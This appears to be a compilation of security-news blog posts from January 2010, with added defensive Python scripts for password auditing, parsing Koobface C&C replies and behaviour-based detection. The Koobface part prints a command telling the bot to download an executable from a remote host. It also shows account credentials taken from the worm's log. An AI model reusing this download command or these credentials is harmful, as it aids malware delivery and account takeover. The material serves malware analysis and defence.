-- Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
-- Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutive digits, adjacent keyboard keys, and so on).

The most common password among Rockyou.com account owners is “123456”.”

They also found that things hadn’t improved much in 20 years.

“In 1990, a study of Unix password security revealed that password selection is strikingly similar to the 32 million breached passwords. Just ten years ago, hacked Hotmail passwords showed little change. This means that the users, if allowed to, will choose very weak passwords even for sites that hold their most private data. Worse, as hackers continue to rapidly adopt smarter brute force password cracking software, consumers and companies will be at greater risk.”

The unusually concise and well-written five-page Imperva report could be really handy for user education. It also contains links to other studies and articles on password security.
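As an added example that is not part of the Imperva report or of this post, the following Python script reproduces the three measurements above (short passwords, limited character set, trivial choices) over a small constructed password list, and reuses the same rules as a signup-time policy check. The dictionary, name list and keyboard rows are assumptions standing in for the real wordlists an attacker's cracker would use.

```python
import re
from collections import Counter

# Keyboard rows used to spot "adjacent keyboard keys" passwords (qwerty, asdfgh, 123456).
KEYBOARD_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")

# Constructed stand-in for a real dictionary/name list (assumption: a deployment
# would load a full wordlist here).
DICTIONARY = {
    "password", "princess", "iloveyou", "sunshine", "monkey", "dragon",
    "football", "letmein", "rockyou", "abc123", "nicole", "daniel", "jessica",
}

ALNUM_ONLY = re.compile(r"^[A-Za-z0-9]+$")


def is_keyboard_walk(pw: str) -> bool:
    """True if the password is a run of adjacent keys on one row, in either direction."""
    p = pw.lower()
    if len(p) < 3:
        return False
    return any(p in row or p in row[::-1] for row in KEYBOARD_ROWS)


def is_consecutive_digits(pw: str) -> bool:
    """True for all-digit passwords that step +1 or -1 at every position (12345, 987654)."""
    if len(pw) < 3 or not pw.isdigit():
        return False
    steps = {int(b) - int(a) for a, b in zip(pw, pw[1:])}
    return steps in ({1}, {-1})


def is_trivial(pw: str) -> bool:
    """Names, dictionary words, keyboard walks, digit runs, or one repeated character."""
    p = pw.lower()
    return (
        p in DICTIONARY
        or is_keyboard_walk(p)
        or is_consecutive_digits(p)
        or (len(p) >= 3 and len(set(p)) == 1)
    )


def classify(pw: str) -> set:
    """Tag one password with the report's three weakness categories (empty set = none)."""
    tags = set()
    if len(pw) <= 6:
        tags.add("short")
    if ALNUM_ONLY.match(pw):
        tags.add("limited_charset")
    if is_trivial(pw):
        tags.add("trivial")
    return tags


def is_weak(pw: str) -> bool:
    """Policy check a site could run at signup: reject anything that trips a category."""
    return bool(classify(pw))


def summarize(passwords) -> dict:
    """Reproduce the report's headline counts over a breached password list."""
    counts = Counter()
    for pw in passwords:
        counts.update(classify(pw))
    return {
        "total": len(passwords),
        "short": counts["short"],
        "limited_charset": counts["limited_charset"],
        "trivial": counts["trivial"],
        "top": Counter(passwords).most_common(3),
    }


# Constructed sample standing in for the 32 million leaked entries.
SAMPLE = (
    ["123456"] * 5 + ["12345"] * 3 + ["password"] * 2
    + ["iloveyou", "princess", "rockyou", "abc123", "qwerty", "Nicole", "Daniel",
       "babygirl", "monkey", "Tr0ub4dor&3", "correct-horse", "X9#kL2@pQ"]
)

if __name__ == "__main__":
    stats = summarize(SAMPLE)
    for key in ("short", "limited_charset", "trivial"):
        print(f"{key:16s} {100 * stats[key] / stats['total']:5.1f}%")
    print("most common:", stats["top"])
```

Note that the categories overlap, exactly as in the report's figures: "123456" is short, alphanumeric-only and trivial all at once, which is why the three percentages do not sum to 100.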

Targeted Attack using "Operation Aurora" as the lure

Now here's an interesting turn of events.

In the middle of all the attention to the "Operation Aurora" attacks, we're now seeing new targeted attacks that are using this very event as the lure to get the targets to open a malicious attachment!

Here's the email we saw:




The attachment Chinese cyberattack.pdf (md5: 238ecf8c0aee8bfd216cf3cad5d82448) is a PDF file which exploits the CVE-2009-4324 vulnerability in Adobe Reader (again, this is the one which was patched last week).

The exploit drops and runs a backdoor called Acrobat.exe (md5: 72170fc42ae1ca8a838843a55e293435).

Intelligence sector hit by a targeted attack

We just blogged about a highly targeted attack against military contractors.

Now we saw one against the intelligence sector.

This attack was done with a PDF file. Again.

It was targeting the CVE-2009-4324 vulnerability. Again.

When opened, the PDF file (md5: c3079303562d4672d6c3810f91235d9b) looked like this:




What really happens in the background? Just like last time, the exploit code drops a backdoor in a file called Updater.exe (md5: 02420bb8fd8258f8afd4e01029b7a2b0).

Now, what is the document talking about? President's day? DNI Information Sharing Environment? We don't know, but a quick web search tells us that apparently there is going to be an Intelligence fair & expo in Germany next month.



Hmm. The Agenda looks awfully familiar.

Microsoft Vulnerabilities

Microsoft is releasing an out-of-band update for their IE vulnerability.

Internet Explorer 6 is affected and is being actively exploited in the wild.

The patch will be released on the 21st, today, see Microsoft's Security Bulletin for additional details.

Also in Microsoft news, Security Advisory (979682) describes a privilege-escalation vulnerability in the Windows kernel.

The vulnerability affects all versions of Windows (NT 3.51 up to Windows 7) on 32-bit (non-x64) systems, unless 16-bit application support is disabled.

There's a workaround for disabling 16-bit support provided in Microsoft's Security Advisory.

Disabling 16-bit applications will mitigate the issue. Then, you'll be all set.

Unless you happen to use a 16-bit, 420 byte tool, from 1998, to convert hex to dec…



Some people still use such apps in 2010, for real.

Microsoft will patch Internet Explorer today

Microsoft has said it will issue an out-of-band patch today for critical vulnerabilities in Internet Explorer that allow remote execution of code. The company said yesterday it would not wait until the February "Patch Tuesday" to fix the vulnerabilities.

The much discussed “Aurora” vulnerabilities in IE have been held at least partially responsible for cyber attacks on Google and more than two dozen other major companies. The attacks on Google were aimed at Gmail accounts of dissidents and Google’s source code. The attacks on the other companies were aimed at stealing intellectual property.

“Microsoft Security Bulletin Advance Notification for January 2010” Here.

Saturday, January 16, 2010

Facebook Privacy Doesn't Really Exist

Facebook recently rolled out new privacy settings that provide additional publishing controls.

For example, Facebook users can now publish a photo to a selected list of friends.




Haiti Earthquake: Another Rogue Rides the News

A day after the disaster that struck the Caribbean nation of Haiti, Rogue perpetrators have once again been busy with their SEO poisoning schemes. Searching for terms related to this earthquake leads to a website that installs a Rogue into the system.

It happens when an unsuspecting user searches for Haiti Earthquake details.


GhostAntivirus

GhostAntivirus is a new rogue anti-virus application. It is a clone of InternetAntivirusPro.


Symantec - Spam and Phishing Landscape: January 2010

Notable highlights this month include the shift of the regions of message origin, and changes in the average size of spam messages.
  • In recent months, APJ and South America have been taking the spam share away from the traditional leaders of North America and EMEA. However, North America and EMEA together sent 57 percent of spam messages in December 2009, compared with 50 percent in November 2009.
  • With respect to the average size of the messages, the 2kb – 5kb message size category increased by seven percent, while the 5kb – 10kb message size category decreased by six percent in December 2009.
  • With respect to all spam categories, health and product spam have increased and now account for 52 percent of all spam messages.

Click here to download the January 2010 State of Spam Report, which highlights the following trends:
  • Xmas Card, Loaded with Malware
  • Your Bank Has Declared Bankruptcy
  • Pills From Amazon?
  • December 2009: Spam Subject Line Analysis
  • “Dotted Quad” Spam Shows Sign of Eruption
  • Andy Lau Talks Chinese Invoice Spam
In addition, the January 2010 State of Phishing Report has also been made available here and highlights the following trends:
  • Symantec observed a four percent decrease from the previous month in all phishing attacks.
  • Twenty-one percent of phishing URLs were generated using phishing toolkits; a decrease of 19 percent from the previous month.
  • A 26 percent decrease from the previous month was observed in non-English phishing sites.
  • More than 118 Web hosting services were used, which accounted for 11 percent of all phishing attacks; an increase of two percent in total Web host URLs when compared to the previous month.

New Koobface variant saves researchers time from analysis

Researchers at McAfee Labs monitor Koobface activity 24/7 via custom honeypots, and while reviewing one such update we noticed a variant that had debug/log features. Unlike the traditional CAPTCHA-breaking technique used to create new accounts, this variant of the worm converts the infected machine into a bot.

When we analysed the malware trapped by our honeypots, we found that this variant of Koobface has a special feature for logging all activities carried out during the infection process to a log file. The log file is created in the system root with a date stamp in its name, e.g. C:\fb_reg20090612.log.

Activities logged by the worm:



Before every entry in the log file, it queries the thread ID and process ID and adds them as a prefix. The worm also logs the iexplore.exe version. It then sends a query to www.google.com to ensure that there is an active internet connection; this step is logged as “check inet”. Once a response to the query is received, it concludes that the internet connection is available and logs “inet ok”.

This particular variant of the Koobface worm contains an encrypted list of compromised websites. On every execution it selects a random URL from the list and sends a query to check whether the domain is still valid. Upon getting a response from the site, it posts a request to the same site to download its latest variant.

Response received:

#BLACKLABEL

RESET

UPDATE|http://[Removed]/.sys/?getexe=fb.79.exe

EXIT

The Koobface worm then requests further information from the compromised site, such as login name, password, birthday year, birthday month and birthday day, which is used to log in to a Facebook account.

The screenshot clearly shows the request sent and response:


The worm saves the response received in another log file, as below. It then tries to log on to the Facebook account using those credentials. On successful login it tries sending friend requests or scanning friend lists. If the credentials are not accepted, it terminates itself.

ThreadID:1664 ProcID: 1916 #BLACKLABEL

ThreadID:1664 ProcID: 1916 SOFT|ADD

ThreadID:1664 ProcID: 1916 LOGIN|as9:76Aipeim0fsm

ThreadID:1664 ProcID: 1916 PASS|zjnez363

ThreadID:1664 ProcID: 1916 ID|20589

ThreadID:1664 ProcID: 1916 BIRTHDAY-YEAR|1975

ThreadID:1664 ProcID: 1916 BIRTHDAY-MONTH|10

ThreadID:1664 ProcID: 1916 BIRTHDAY-DAY|15

ThreadID:1664 ProcID: 1916 LOGS|1
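The pipe-delimited command format above is simple enough to parse directly. The following Python is an added example, not McAfee's code: it parses a #BLACKLABEL reply into commands, pulls the UPDATE URL and its host out as indicators for blocking or hunting, and reassembles the credentials from the worm's own log. The sample reply uses a constructed placeholder host (c2.example.invalid) in place of the redacted one; the log lines are the ones shown in the post.

```python
import re

LOG_LINE = re.compile(r"^ThreadID:(\d+)\s+ProcID:\s*(\d+)\s+(.*)$")
URL_HOST = re.compile(r"^https?://([^/:?#]+)", re.IGNORECASE)
MAGIC = "#BLACKLABEL"


def parse_command(line: str):
    """Split one 'NAME|argument' line; commands without '|' get a None argument."""
    name, sep, arg = line.strip().partition("|")
    return name, (arg if sep else None)


def parse_c2_response(body: str):
    """Parse a C&C reply into an ordered command list, or None if the magic header is absent.

    The None result doubles as a cheap content check for proxy/IDS logs: a body that
    does not start with the magic line is not a Koobface reply at all.
    """
    lines = [l.strip() for l in body.splitlines() if l.strip()]
    if not lines or lines[0] != MAGIC:
        return None
    return [parse_command(l) for l in lines[1:]]


def extract_indicators(commands) -> dict:
    """Pull download URLs and their hosts out of UPDATE commands."""
    urls = [arg for name, arg in commands if name == "UPDATE" and arg]
    hosts = set()
    for u in urls:
        m = URL_HOST.match(u)
        if m:
            hosts.add(m.group(1).lower())
    return {"update_urls": urls, "hosts": sorted(hosts)}


def parse_log(text: str) -> list:
    """Turn the bot's 'ThreadID:.. ProcID:.. NAME|arg' log lines into records."""
    records = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # blank lines and anything not written by the worm
        tid, pid, body = m.groups()
        name, arg = parse_command(body)
        records.append({"tid": int(tid), "pid": int(pid), "name": name, "arg": arg})
    return records


def credentials_from_log(records) -> dict:
    """Reassemble the account the C&C handed out (for abuse reports to the site)."""
    fields = {
        "LOGIN": "login", "PASS": "password", "ID": "id",
        "BIRTHDAY-YEAR": "year", "BIRTHDAY-MONTH": "month", "BIRTHDAY-DAY": "day",
    }
    return {fields[r["name"]]: r["arg"] for r in records if r["name"] in fields}


# Constructed samples: the C&C reply from the post with the redacted host replaced by a
# placeholder, and the log lines as shown in the post.
SAMPLE_RESPONSE = """#BLACKLABEL
RESET
UPDATE|http://c2.example.invalid/.sys/?getexe=fb.79.exe
EXIT
"""

SAMPLE_LOG = """ThreadID:1664 ProcID: 1916 #BLACKLABEL
ThreadID:1664 ProcID: 1916 SOFT|ADD
ThreadID:1664 ProcID: 1916 LOGIN|as9:76Aipeim0fsm
ThreadID:1664 ProcID: 1916 PASS|zjnez363
ThreadID:1664 ProcID: 1916 ID|20589
ThreadID:1664 ProcID: 1916 BIRTHDAY-YEAR|1975
ThreadID:1664 ProcID: 1916 BIRTHDAY-MONTH|10
ThreadID:1664 ProcID: 1916 BIRTHDAY-DAY|15
ThreadID:1664 ProcID: 1916 LOGS|1
"""

if __name__ == "__main__":
    cmds = parse_c2_response(SAMPLE_RESPONSE)
    print("commands:", cmds)
    print("indicators:", extract_indicators(cmds))
    print("credentials:", credentials_from_log(parse_log(SAMPLE_LOG)))
```

Splitting on the first "|" only matters for the LOGIN value, which itself contains a colon and could in other variants contain further delimiters; everything after the first separator is kept as the argument.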

I have observed the same behavior on Twitter as well. I suggest not clicking on links and other requests from unknown users and being careful with unusual messages from friends.

Seasons of Scams

With the holiday season behind us, cyber scammers and spammers will now be looking towards the upcoming events and worldwide happenings that they can leverage to form the next waves of online trickery. The noteworthy ones on the horizon include Valentine’s Day, tax-filing season, and the FIFA World Cup – all of which will, in all likelihood, produce their own variety of social engineering techniques, online fraud, malware, fake websites, phishing, and spam.

And some of these tactics are, unfortunately, already underway, while the events themselves are months away. According to Computer Weekly, cyber police from the UK’s Scotland Yard have already uncovered and shut down over 100 World Cup-related scams. In terms of leveraging tax season, anti-spam researchers at Trend Micro are reporting that spam messages purporting to come from the U.S. Internal Revenue Service are making the rounds, attempting to infect users with malware.

What’s the bottom line for these cyber scammers? In some cases, it’s to con you into making a bogus purchase so that the thieves reap the rewards. In others, the scams may be set up in order to get you to divulge your personal information, which in turn can be used for more widespread criminal means, including identity theft.

Identity theft is currently one of the fastest growing crimes of our time, making it an important topic to be aware of, no matter the season.

Keep watching this space for regular updates on the latest scams you should be aware of. And remember, if you’d like to receive my news directly to your inbox, just subscribe to my mailing list.

Consistent Computer Virus Malcode names

InfoSecurity, a great site for computer security news, just put up a story asking the very old question: “Why don’t AV vendors name malcode consistently.”

The lead on the piece was: “…Fortinet, Sunbelt Software, and Kaspersky all published their lists of the most prevalent malware strains for the last month of 2009, but they didn't match up, leading to an admission that users will inevitably be confused by the results.”

Great observation, sort of.

Aside from the fact that the mentioned companies are competitors, pulling in-the-wild malicious code from different continents, the answer(s) to that question:

1. The process of finding and analyzing malicious code and writing detections for it (and NOT writing false positives) moves very fast. Although AV companies have been trying to use consistent names since they drew up the 1991 Computer AntiVirus Researcher Organization’s New Virus Naming Convention, there simply isn’t enough manpower to do it 100 percent because:

2. There has been a vast explosion in the amount of malcode that is in circulation. Possibly more than 20 million new variants just last year.

InfoSecurity ran a story immediately before the story we’re discussing here, reporting PandaLabs figures for 2009. PandaLabs estimated that 55,000 new pieces of malcode were detected each day of 2009. That’s 20 million in the year -- more new malcode in one year than all the preceding 20 years. (story here.)

3. One might also ask why "users" need consistent names at all. If they want to look for information on a piece of malcode their scanner has found, well, the scanner found it and has probably given it a name, however generic. If they're infected and their scanner hasn't spotted the malcode, that means it's probably new and doesn't HAVE a name. In that case, they're going to have to send a sample to their AV company to have it put in detections. If they want to compare the detections of different AV companies, the way to do it is get a sample or an MD5 hash of the suspect file and run it in VirusTotal.

4. In the face of the onslaught of malicious code, many anti-malware companies have begun moving to behavior based detection: detecting malicious code by scanning for malicious sections of code or running it in a virtual environment to detect malicious activity. This has resulted in “generic” or “batch” names for detections.

If a piece of code under test is trying to shut down anti-malcode scanners, find other computers through directory shares, put an auto-start line in the Windows Registry and phone home the fact that it has installed itself on a specific computer – well, it probably isn’t JUST a cute little animation of a kitten. If it walks like a duck and quacks like a duck…
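A minimal version of that reasoning, as an added example rather than any vendor's engine: each rule fires at most once over a sandbox trace, the weights are summed, and only the combination of signals reaches a malicious verdict, which is exactly why such detections end up with generic names. The event kinds, process names, rule weights and sandbox traces are constructed assumptions.

```python
from dataclasses import dataclass

# Constructed short list of security-product process names a sample might try to kill.
SECURITY_PROCESSES = {"avp.exe", "mcshield.exe", "msmpeng.exe", "ccsvchst.exe"}


@dataclass(frozen=True)
class Event:
    kind: str    # what the sandbox saw: process_kill, registry_write, share_enum, net_connect, file_write
    detail: str  # process name, registry path, target host, file path


def _is_private(host: str) -> bool:
    # Simplified RFC 1918 / loopback check (assumption: good enough for the example).
    return host.startswith(("10.", "192.168.", "172.16.", "127."))


# (rule name, weight, predicate over one event)
RULES = (
    ("kills_security_product", 3,
     lambda e: e.kind == "process_kill" and e.detail.lower() in SECURITY_PROCESSES),
    ("autostart_persistence", 2,
     lambda e: e.kind == "registry_write" and "\\currentversion\\run" in e.detail.lower()),
    ("enumerates_shares", 2,
     lambda e: e.kind == "share_enum"),
    ("phones_home", 2,
     lambda e: e.kind == "net_connect" and not _is_private(e.detail)),
)


def score_trace(events) -> dict:
    """Fire each rule at most once over the whole trace, then combine the weights."""
    fired = set()
    for e in events:
        for name, weight, pred in RULES:
            if pred(e):
                fired.add((name, weight))
    score = sum(w for _, w in fired)
    # One signal alone (an installer writing a Run key, a browser connecting out) is
    # normal; the combination is what earns a generic "Backdoor/Worm" verdict.
    if score >= 6 or len(fired) >= 3:
        verdict = "malicious"
    elif score > 0:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"score": score, "rules": sorted(n for n, _ in fired), "verdict": verdict}


# Constructed traces: a harmless screensaver, an installer, and the duck-like sample.
KITTEN_TRACE = [
    Event("file_write", r"C:\Users\me\kitten.scr"),
    Event("net_connect", "192.168.1.10"),
]
INSTALLER_TRACE = [
    Event("file_write", r"C:\Program Files\Tool\tool.exe"),
    Event("registry_write", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tool"),
]
WORM_TRACE = [
    Event("process_kill", "MsMpEng.exe"),
    Event("share_enum", r"\\FILESRV01"),
    Event("registry_write", r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater"),
    Event("net_connect", "203.0.113.7"),
    Event("net_connect", "203.0.113.7"),  # repeated beacons do not double-count
]

if __name__ == "__main__":
    for label, trace in (("kitten", KITTEN_TRACE), ("installer", INSTALLER_TRACE), ("worm", WORM_TRACE)):
        print(label, score_trace(trace))
```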

Wednesday, January 13, 2010

What's "Near Me Now"?!

Have you ever stood outside a restaurant wondering whether to go inside? Google now solves this problem very easily with yet another mind-boggling feature for Android phones and the iPhone, known as ‘Near Me Now’. When you open google.com on an Android phone or iPhone, you see a small new addition to the homepage: a ‘Near Me Now’ option below the search box.

Functionality of Near Me Now

When you open google.com, your location is turned into a search query automatically. This lets you search Google for restaurants, coffee shops, ATMs, banks and bars near your current location.
There is also an option called ‘Explore right here’, which reveals notable places near your current location. The feature also provides ratings for restaurants, coffee shops and bars along with their distance from your present location. For these results Google uses customer review sites like Foursquare and Yelp and location-based services (LBS) such as Twitter, Facebook status updates and Loopt.

Release

This feature is currently available in the United States only. Those of us in India remain deprived of the pleasure of using it, with no prospect of a release in the near future.


Rimecud and Hamweq - birds of a feather

Following the addition of Win32/Hamweq to the MSRT last month, MMPC will continue cleaning PCs in 2010 by adding another prevalent worm, Win32/Rimecud, to this month's removal tool.

This is due not only to Win32/Rimecud's high detection numbers, which immediately follow those of Win32/Hamweq, but also to the similarities the two families share with each other.

In fact, as part of its payload, Win32/Hamweq may download Win32/Rimecud, contributing to Rimecud's suitability as the next target for MSRT.

Win32/Rimecud is a family of worms that spreads via fixed and removable drives, instant messaging programs, and P2P networks. Similar to Hamweq, it also contains backdoor functionality that allows unauthorized access to affected machines. However, compared to Hamweq, Win32/Rimecud's backdoor supports a more diverse and sophisticated set of commands, giving the remote attacker greater control of the compromised machine.

Win32/Rimecud uses a variety of obfuscators to hinder detection. These are written in C/C++/Delphi/Visual Basic and usually have virtual environment detection and anti-emulation tricks to make the malware harder to detect.

Other similarities to Win32/Hamweq's behavior include using the Recycle Bin as the target drop folder for copies of itself, injecting code into the explorer.exe process and the capability to spread via removable drives.

By looking at the similarities between the two threats we could speculate that they were created by the same author(s). Like they say: "Birds of a feather".

Plenty of Updates on Patch Tuesday

This Black Tuesday was different, as anticipated: Microsoft released only one security bulletin, but other companies jumped in and delivered updates as well.


For the Windows operating systems, only one security bulletin was released. MS10-001 deals with a vulnerability in the decompression routines of the Embedded OpenType (EOT) Font Engine. This means that, especially on Windows 2000, programs like Internet Explorer, Word or PowerPoint which render EOT fonts can put the system at risk when viewing manipulated content. In newer operating systems the flawed code is used differently, so Microsoft assumes that it isn’t exploitable there.

The company also released a Security Advisory on the Adobe Flash Player version that is installed by default on Windows XP. Due to security vulnerabilities in that version, attackers may inject malicious code and compromise the computer. Microsoft advises users and administrators to either uninstall or update the software. Current versions are available on Adobe’s web site.


Adobe also released updated versions of Reader and Acrobat. They close security holes in the popular software that are already being exploited in the wild. The updated Reader software is available here, while Acrobat updates are available here.

On a side note, Oracle also released Critical Patch Updates (CPU) for several of its database products.

As all updates deal with critical security vulnerabilities, users are advised to install them as soon as possible. Administrators should start their tests immediately so they can roll out the fixed software ASAP, too, as some of those vulnerabilities already get exploited by cyber criminals.

Lethic gone: another botnet bites the dust


The Darkreading.com site is reporting that researchers with communications security firm Neustar, of Sterling, Va., working with ISPs, have taken over the command-and-control servers and shut down the Lethic botnet. The owners of the Lethic network specialized in diploma, pharmaceutical and replica spam. It is believed that Lethic was responsible for 10 percent of spam.

Other recent botnet takedowns include:
-- McColo (Nov. 08),
-- Torpig (May 09),
-- MegaD (Nov. 09)

Story here.

SysDefenders

SysDefenders is the latest addition to the clones of the WiniGuard rogue anti-spyware family.



If your computer is infected with this malware, you should remove it soon. Click Here to learn how.

It's Nice To Get Noticed

Looking at a random new incoming malware sample in F-Secure’s sample automation systems, notice the mutex names it uses:



Hey STFU yourself, why don't you?

P.S. It's detected as Email-Worm:MSIL/Agent.MXK

Busy time for spammers during winter holidays

Spammers and malware authors took advantage of the holiday period, when many people are at home, and sent a large volume of email just before the official days off. As can be seen in the graphic below, we registered higher activity in the two days before the holidays and immediately after them. The red bars are either weekend days or holidays (25.12 and 1.1).



What kind of spam was sent?

A lot of meds spam, fake products and a lot of malware carried as attachment in different forms:
  • Pictures or news about Angelina Jolie
  • News about Barack Obama
  • Outlook Web Access password reset
  • Post packet tracking
  • Greeting cards
  • Flash Exploits
  • others

Conclusions
Sadly, we see that a lot of spam was sent during business hours. This means that many computers in companies are infected and are part of a botnet. Although we see that even more spam was sent in the evening, that actually corresponds to peak hours in the USA (23h in Germany is 17h on the East Coast and 14h on the West Coast). Of course, we cannot say that all the spam originates from the USA, but many reports have shown that it is the biggest source of spam and of hosting for malicious files and websites.

BlackBerry Messenger the new vehicle to distribute Hoaxes?

I received an interesting IM from a friend via BlackBerry Messenger [BBM] this weekend. She was worried that it could do damage to her shiny new BlackBerry and, as she knew I work for [a security company], she forwarded it to me for my opinion.



As soon as I read it, I knew it was a hoax and told her just to delete it.

It didn’t really surprise me that these hoaxes are now being spread via BBM, as the devices are becoming increasingly popular. I’m sure all of you have received the usual one via e-mail about a virus which burns the whole hard disk C: of your computer; well, now I believe you will be seeing them on your BlackBerry.

I don’t want to take the usual route of blaming social networking sites, but I believe they are the cause of this new wave of hoaxes. The problem with social networks is that they enable almost anyone to add you on several different IMs just by visiting your page, if you do not set your privacy settings correctly.

The new BBM also lets you add new users by taking a picture of a barcode which is uniquely created for your BlackBerry PIN. This makes it incredibly easy for people you don’t know to add you to their contact list, which leaves you open to receiving more hoaxes or spam messages.

I have personally seen lots of these barcodes on several social networks and forums, and I warn those who read this blog not to do the same and to share their PIN only with contacts they trust.

Users should be careful about who they accept as contacts, as you may start to see a lot more of these hoaxes, or even spam, in your BBM inbox.